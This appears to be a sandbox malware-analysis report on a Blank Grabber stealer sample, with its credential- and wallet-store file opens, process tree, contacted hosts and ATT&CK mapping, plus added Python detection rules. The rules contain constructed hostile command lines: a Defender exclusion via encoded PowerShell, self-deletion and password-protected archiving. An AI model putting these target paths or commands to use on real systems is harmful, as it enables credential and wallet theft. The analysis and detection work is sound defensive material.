Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Users\user\Desktop\KpHYfxnJs6.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: Yara matchFile source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR
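The file-open list above is, in effect, the stealer's target list: a single process that is not a browser opens Chrome's cookie, form-data and extension stores, Edge's history, Firefox's cookies and places databases, and then the Exodus, Electrum, Atomic, Guarda, Coinomi and Jaxx wallet directories. The Python below is an added example, not code from this report or from the Blank Grabber project, that turns that access pattern into a detection over file-open events of the kind a Sysmon or ETW file-access trace yields. The target paths are the ones the report lists; the owner image names (chrome.exe, Exodus.exe and so on), the flagging thresholds and the event stream are assumptions made for the example.

```python
"""Flag a process that reads several browsers' and wallets' secret stores.

Added example, not from the Joe Sandbox report or the Blank Grabber project.
Target paths come from the report's "File opened" list; owner image names,
thresholds and the sample event stream are assumptions for illustration.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Target:
    name: str
    kind: str            # "browser" or "wallet"
    pattern: re.Pattern
    owners: frozenset    # images that legitimately open the store (assumed)


def _t(name, kind, regex, *owners):
    return Target(name, kind, re.compile(regex, re.IGNORECASE),
                  frozenset(o.lower() for o in owners))


TARGETS = [
    _t("chrome_cookies", "browser", r"\\Google\\Chrome\\User Data\\[^\\]+\\Network\\Cookies$", "chrome.exe"),
    _t("chrome_webdata", "browser", r"\\Google\\Chrome\\User Data\\[^\\]+\\Web Data$", "chrome.exe"),
    _t("chrome_ext_settings", "browser", r"\\Google\\Chrome\\User Data\\[^\\]+\\Local Extension Settings\\", "chrome.exe"),
    _t("edge_history", "browser", r"\\Microsoft\\Edge\\User Data\\[^\\]+\\History$", "msedge.exe"),
    _t("firefox_cookies", "browser", r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$", "firefox.exe"),
    _t("firefox_places", "browser", r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\places\.sqlite$", "firefox.exe"),
    _t("exodus", "wallet", r"\\Exodus\\exodus\.wallet", "Exodus.exe"),
    _t("electrum", "wallet", r"\\Electrum\\wallets", "electrum.exe"),
    _t("atomic", "wallet", r"\\atomic\\Local Storage\\leveldb", "Atomic Wallet.exe"),
    _t("guarda", "wallet", r"\\Guarda\\Local Storage\\leveldb", "Guarda.exe"),
    _t("coinomi", "wallet", r"\\Coinomi\\Coinomi\\wallets", "Coinomi.exe"),
    _t("jaxx", "wallet", r"\\com\.liberty\.jaxx\\IndexedDB", "Jaxx Liberty.exe"),
]


def classify(path):
    """Return the Target a path belongs to, or None for an uninteresting path."""
    for t in TARGETS:
        if t.pattern.search(path):
            return t
    return None


def score_events(events, min_targets=3):
    """events: iterable of (image_name, path) file-open events.

    A process is flagged when it opens stores it does not own from at least
    `min_targets` distinct targets, or any browser store together with any
    wallet store. Opens by the owning application (chrome.exe on Chrome's
    cookies) are ignored, which keeps normal browser activity out of the score.
    """
    touched = defaultdict(lambda: {"browser": set(), "wallet": set()})
    for image, path in events:
        t = classify(path)
        if t is None or image.lower() in t.owners:
            continue
        touched[image][t.kind].add(t.name)
    report = {}
    for image, kinds in touched.items():
        n = len(kinds["browser"]) + len(kinds["wallet"])
        cross = bool(kinds["browser"]) and bool(kinds["wallet"])
        report[image] = {"browser": sorted(kinds["browser"]),
                         "wallet": sorted(kinds["wallet"]),
                         "flagged": cross or n >= min_targets}
    return report


# Constructed event stream: the stealer's opens reuse paths from the report,
# the other entries are benign controls (owner apps, a one-off backup tool).
P = r"C:\Users\user\AppData"
EVENTS = [
    ("chrome.exe", P + r"\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    ("firefox.exe", P + r"\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite"),
    ("Exodus.exe", P + r"\Roaming\Exodus\exodus.wallet"),
    ("backup.exe", P + r"\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite"),
    ("notepad.exe", r"C:\Users\user\Documents\notes.txt"),
    ("KpHYfxnJs6.exe", P + r"\Local\Google\Chrome\User Data\Default\Network\Cookies"),
    ("KpHYfxnJs6.exe", P + r"\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm"),
    ("KpHYfxnJs6.exe", P + r"\Local\Google\Chrome\User Data\Default\Web Data"),
    ("KpHYfxnJs6.exe", P + r"\Local\Microsoft\Edge\User Data\Default\History"),
    ("KpHYfxnJs6.exe", P + r"\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite"),
    ("KpHYfxnJs6.exe", P + r"\Roaming\Exodus\exodus.wallet"),
    ("KpHYfxnJs6.exe", P + r"\Roaming\Electrum\wallets"),
    ("KpHYfxnJs6.exe", P + r"\Local\Coinomi\Coinomi\wallets"),
]

if __name__ == "__main__":
    for image, r in score_events(EVENTS).items():
        print(image, "FLAGGED" if r["flagged"] else "ok", r["browser"], r["wallet"])
```

The owner allow-list is what keeps this rule quiet on a normal desktop: browsers and wallet applications open their own stores constantly, so a single non-owner open (the backup tool above) is recorded but not flagged, while one image touching three or more stores, or a browser store plus a wallet, is.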

Remote Access Functionality

Source: Yara match | File source: 00000004.00000003.2878432052.000000000838F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2051169917.00000000050F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2051169917.00000000050F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2478525304.0000000007540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: KpHYfxnJs6.exe PID: 7320, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\_MEI73202\rarreg.key, type: DROPPED
Source: Yara match | File source: Process Memory Space: KpHYfxnJs6.exe PID: 7732, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; techniques are listed top to bottom as they appear in the matrix, and a number in parentheses is the count the matrix attaches to a technique the analysis matched)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (241); Command and Scripting Interpreter (22); PowerShell (3); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
Persistence: DLL Side-Loading (1); Registry Run Keys / Startup Folder (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
Defense Evasion: File and Directory Permissions Modification (1); Disable or Modify Tools (4); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (31); Software Packing (21); DLL Side-Loading (1); File Deletion (1); Modify Registry (1); Virtualization/Sandbox Evasion (461); Access Token Manipulation (1); Process Injection (11)
Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (1); File and Directory Discovery (2); System Information Discovery (49); Security Software Discovery (771); Process Discovery (2); Virtualization/Sandbox Evasion (461); Application Window Discovery (1); Remote System Discovery (11); System Network Configuration Discovery (11); Network Service Discovery; System Network Connections Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
Collection: Archive Collected Data (1); Data from Local System (3); Email Collection (1); Clipboard Data (1); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Command and Control: Ingress Tool Transfer (3); Encrypted Channel (21); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
Impact: Data Encrypted for Impact (1); System Shutdown/Reboot (1); Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1584305 | Sample: KpHYfxnJs6.exe | Start date: 05/01/2025 | Architecture: WINDOWS | Score: 100

Hosts contacted: ip-api.com, discord.com, blank-whj1o.in
Sample-level signatures: Sigma detected: Capture Wi-Fi password; Multi AV Scanner detection for submitted file; Yara detected Blank Grabber; 14 other signatures

Process tree (bracketed numbers are the counts shown next to each process node in the graph; truncated paths are left as the graph shows them):

• KpHYfxnJs6.exe [22]
  Dropped: C:\Users\user\AppData\Local\Temp\...\rar.exe (PE32+); C:\Users\user\AppData\Local\...\rarreg.key (ASCII); C:\Users\user\AppData\...\unicodedata.pyd (PE32); 16 other files (none is malicious)
  Signatures: Query firmware table information (likely to detect VMs); Tries to detect sandboxes and other dynamic analysis tools (window names); Self deletion via cmd or bat file; 7 other signatures
  • KpHYfxnJs6.exe [1 109]
    Network: ip-api.com 208.95.112.1, ports 49904, 50006, 80 (TUT-ASUS, United States); discord.com 162.159.137.232, ports 443, 50007 (CLOUDFLARENETUS, United States)
    Signatures: Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Self deletion via cmd or bat file; 11 other signatures
    • cmd.exe [1]
      Signatures: Suspicious powershell command line found; Uses ping.exe to sleep; Uses cmd line tools excessively to alter registry or file data; 4 other signatures
      • powershell.exe [23]
      • conhost.exe
    • cmd.exe [1]
      Signatures: Modifies Windows Defender protection settings
      • powershell.exe [23]
        Signatures: Loading BitLocker PowerShell Module
      • conhost.exe
    • cmd.exe
      Signatures: Adds a directory exclusion to Windows Defender
      • powershell.exe
      • conhost.exe
    • 37 other processes
      Signatures: Encrypted powershell cmdline option found; Tries to harvest and steal WLAN passwords
      • systeminfo.exe
        Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Writes or reads registry keys via WMI
      • getmac.exe
      • 72 other processes
        Dropped: C:\Users\user\AppData\...\bifucm0t.cmdline (Unicode); C:\Users\user\AppData\Local\Temp\CoY55.zip (RAR)
        • csc.exe
          Dropped: C:\Users\user\AppData\Local\...\bifucm0t.dll (PE32)
          • cvtres.exe
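The process tree above is the chain a host-based detection should key on: the second-stage KpHYfxnJs6.exe spawns cmd.exe, which runs powershell.exe with an encoded command that changes Windows Defender settings and adds an exclusion; another cmd.exe sleeps with ping and deletes the sample; csc.exe compiles a .cmdline dropped under the user's Temp directory; and rar.exe, itself dropped in Temp, packs the collected data. The script below is an added example, not code from this report or from the Blank Grabber project. It runs one rule per behaviour over constructed Sysmon-style process-creation records; the PIDs, the exact command lines, the user name, the RAR password and the ping-then-del form of the self-deletion are assumptions modelled on the signature names in the graph, not command lines taken from the sample.

```python
"""Process-creation rules for the chain shown in the behavior graph.

Added example, not from the Joe Sandbox report or the Blank Grabber project.
Rules are modelled on the signatures named in the graph; the event records
(PIDs, command lines, user name, password) are constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full image path, as Sysmon Event ID 1 reports it
    cmdline: str


# -e, -ec, -enc and -EncodedCommand all carry base64 of a UTF-16LE script.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
TEMP_DIR = re.compile(r"(?i)\\AppData\\Local\\Temp\\")


def decode_encoded_command(cmdline):
    """Return the decoded script behind an -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def check_event(ev):
    """Return the names of the rules the event triggers (empty list if none)."""
    hits = []
    img = ev.image.rsplit("\\", 1)[-1].lower()
    cl = ev.cmdline
    if TEMP_DIR.search(ev.image):
        hits.append("image_in_temp")
    if img == "powershell.exe":
        script = decode_encoded_command(cl)
        if script is not None:
            hits.append("encoded_powershell")
            # Exclusions and protection changes go through the MpPreference cmdlets.
            if re.search(r"(?i)\b(Add|Set)-MpPreference\b", script):
                hits.append("defender_mppreference_change")
        if re.search(r"(?i)-(ExecutionPolicy|ep)\s+(Bypass|Unrestricted)", cl):
            hits.append("execution_policy_bypass")
    elif img == "cmd.exe":
        # "ping ... & del <self>": ping as a sleep, then delete the dropper.
        if re.search(r"(?i)\bping\b.*&+\s*del\b", cl):
            hits.append("ping_del_self_delete")
    elif img == "csc.exe":
        if re.search(r"(?i)\\AppData\\Local\\Temp\\[^\s\"]*\.cmdline", cl):
            hits.append("csc_compile_from_temp")
    elif img == "rar.exe":
        if re.search(r"(?:^|\s)-p\S+", cl):      # -p<password> switch
            hits.append("rar_password_archive")
    return hits


def lineage(ev, by_pid):
    """Root-first chain of image names, stopping at an unknown parent."""
    names, seen, cur = [], set(), ev
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        names.append(cur.image.rsplit("\\", 1)[-1])
        cur = by_pid.get(cur.ppid)
    return " > ".join(reversed(names))


def scan(events):
    """Return one finding per event that triggers at least one rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        hits = check_event(e)
        if hits:
            findings.append({"pid": e.pid, "chain": lineage(e, by_pid), "hits": hits})
    return findings


def _encode(script):
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed records modelled on the graph; PID 600 is a benign control.
EXCLUSION = _encode("Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Local\\Temp'")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(100, 1, r"C:\Users\user\Desktop\KpHYfxnJs6.exe", "KpHYfxnJs6.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + EXCLUSION),
    ProcEvent(201, 200, PS, "powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + EXCLUSION),
    ProcEvent(300, 100, r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c ping localhost -n 3 > nul & del /f /q "C:\\Users\\user\\Desktop\\KpHYfxnJs6.exe"'),
    ProcEvent(400, 100, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"'),
    ProcEvent(500, 100, r"C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe",
              r"rar.exe a -r -m5 -psecret C:\Users\user\AppData\Local\Temp\CoY55.zip C:\Users\user\AppData\Local\Temp\staging"),
    ProcEvent(600, 1, PS, "powershell.exe -NoProfile -Command Get-Process"),
]

if __name__ == "__main__":
    for f in scan(EVENTS):
        print(f["pid"], f["chain"], f["hits"])
```

Decoding the -EncodedCommand blob before matching is the part that matters: the Add-MpPreference call never appears in the visible command line, so a rule that only greps the raw string misses the Defender change and sees nothing more than "PowerShell with -enc". The lineage string is what lets an analyst tell a cmd.exe > powershell.exe pair launched by an unknown binary on the Desktop apart from the same pair launched by a management agent.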

Initial sample

Source | Detection | Scanner | Label
KpHYfxnJs6.exe | 43% | Virustotal |
KpHYfxnJs6.exe | 42% | ReversingLabs | Win32.Ransomware.BlankGrabber
KpHYfxnJs6.exe | 100% | Joe Sandbox ML |

Dropped files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\_MEI73202\VCRUNTIME140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\_bz2.pyd | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\_ctypes.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\_decimal.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\_hashlib.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\_lzma.pyd | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\_queue.pyd | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\_socket.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\_sqlite3.pyd | 5% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\_ssl.pyd | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\libcrypto-1_1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\libffi-8.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\libssl-1_1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\python311.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\_MEI73202\select.pyd | 5% | ReversingLabs |
